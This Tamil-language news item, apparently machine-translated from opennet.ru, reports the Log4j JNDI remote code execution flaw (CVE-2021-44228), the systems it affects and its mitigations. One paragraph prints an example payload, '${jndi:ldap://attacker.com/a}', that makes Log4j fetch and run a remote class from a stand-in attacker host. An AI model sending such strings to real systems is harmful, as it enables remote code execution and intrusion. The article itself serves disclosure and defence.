Apache Log4j, Java பயன்பாடுகளில் உள்நுழைவை ஒழுங்கமைப்பதற்கான ஒரு பிரபலமான கட்டமைப்பில், "{jndi:URL}" வடிவத்தில் சிறப்பாக வடிவமைக்கப்பட்ட மதிப்பு பதிவில் எழுதப்பட்டால், தன்னிச்சையான குறியீட்டை செயல்படுத்த அனுமதிக்கும் ஒரு முக்கியமான பாதிப்பு கண்டறியப்பட்டுள்ளது. வெளிப்புற மூலங்களிலிருந்து பெறப்பட்ட மதிப்புகளை பதிவு செய்யும் ஜாவா பயன்பாடுகளில் தாக்குதல் நடத்தப்படலாம், எடுத்துக்காட்டாக, பிழை செய்திகளில் சிக்கல் மதிப்புகளைக் காண்பிக்கும் போது.
Apache Struts, Apache Solr, Apache Druid அல்லது Apache Flink போன்ற கட்டமைப்புகளைப் பயன்படுத்தும் கிட்டத்தட்ட அனைத்து திட்டங்களும் Steam, Apple iCloud, Minecraft கிளையண்டுகள் மற்றும் சேவையகங்கள் உட்பட சிக்கலால் பாதிக்கப்பட்டுள்ளன என்பது குறிப்பிடத்தக்கது. இந்த பாதிப்பு கார்ப்பரேட் பயன்பாடுகள் மீதான பாரிய தாக்குதல்களின் அலைக்கு வழிவகுக்கும் என்று எதிர்பார்க்கப்படுகிறது, இது அப்பாச்சி ஸ்ட்ரட்ஸ் கட்டமைப்பில் உள்ள முக்கியமான பாதிப்புகளின் வரலாற்றை மீண்டும் மீண்டும் செய்கிறது, இது தோராயமான மதிப்பீட்டின்படி, ஃபார்ச்சூனின் 65% வலை பயன்பாடுகளில் பயன்படுத்தப்படுகிறது. 100 நிறுவனங்கள் பாதிக்கப்படக்கூடிய அமைப்புகளுக்கு நெட்வொர்க்கை ஸ்கேன் செய்யும் முயற்சிகள் உட்பட.
ஒரு வேலைச் சுரண்டல் ஏற்கனவே வெளியிடப்பட்டது, ஆனால் நிலையான கிளைகளுக்கான திருத்தங்கள் இன்னும் தொகுக்கப்படவில்லை என்ற உண்மையால் சிக்கல் மோசமடைகிறது. CVE அடையாளங்காட்டி இன்னும் ஒதுக்கப்படவில்லை. பிழைத்திருத்தம் log4j-2.15.0-rc1 சோதனைக் கிளையில் மட்டுமே சேர்க்கப்பட்டுள்ளது. பாதிப்பைத் தடுப்பதற்கான ஒரு தீர்வாக, log4j2.formatMsgNoLookups அளவுருவை true என அமைக்க பரிந்துரைக்கப்படுகிறது.
JNDI (ஜாவா பெயரிடுதல் மற்றும் அடைவு இடைமுகம்) வினவல்களை இயக்கக்கூடிய லாக் 4j சிறப்பு முகமூடிகளான “{}” ஐ லாக் அவுட்புட்டில் செயலாக்குவதை ஆதரிப்பதால் சிக்கல் ஏற்பட்டது. "${jndi:ldap://attacker.com/a}" என்ற பதிலுடன் ஒரு சரத்தை அனுப்புவதற்கு தாக்குதல் கொதித்தது, எந்த log4j ஆனது ஜாவா வகுப்பிற்கான பாதைக்கான LDAP கோரிக்கையை attacker.com சேவையகத்திற்கு அனுப்பும். . தாக்குபவரின் சேவையகத்தால் திருப்பியளிக்கப்பட்ட பாதை (எடுத்துக்காட்டாக, http://second-stage.attacker.com/Exploit.class) தற்போதைய செயல்முறையின் சூழலில் ஏற்றப்பட்டு செயல்படுத்தப்படும், இது தாக்குபவர் தன்னிச்சையான குறியீட்டை இயக்க அனுமதிக்கிறது தற்போதைய பயன்பாட்டின் உரிமைகள் கொண்ட அமைப்பு.
சேர்க்கை 1: பாதிப்பிற்கு CVE-2021-44228 என்ற அடையாளங்காட்டி ஒதுக்கப்பட்டுள்ளது.
சேர்க்கை 2: வெளியீடு log4j-2.15.0-rc1 மூலம் சேர்க்கப்பட்ட பாதுகாப்பைத் தவிர்ப்பதற்கான வழி கண்டறியப்பட்டுள்ளது. ஒரு புதிய மேம்படுத்தல், log4j-2.15.0-rc2, பாதிப்புக்கு எதிரான முழுமையான பாதுகாப்போடு முன்மொழியப்பட்டது. தவறாக வடிவமைக்கப்பட்ட JNDI URL ஐப் பயன்படுத்தினால், அசாதாரணமான முடிவு இல்லாததுடன் தொடர்புடைய மாற்றத்தை குறியீடு எடுத்துக்காட்டுகிறது.
ஆதாரம்: opennet.ru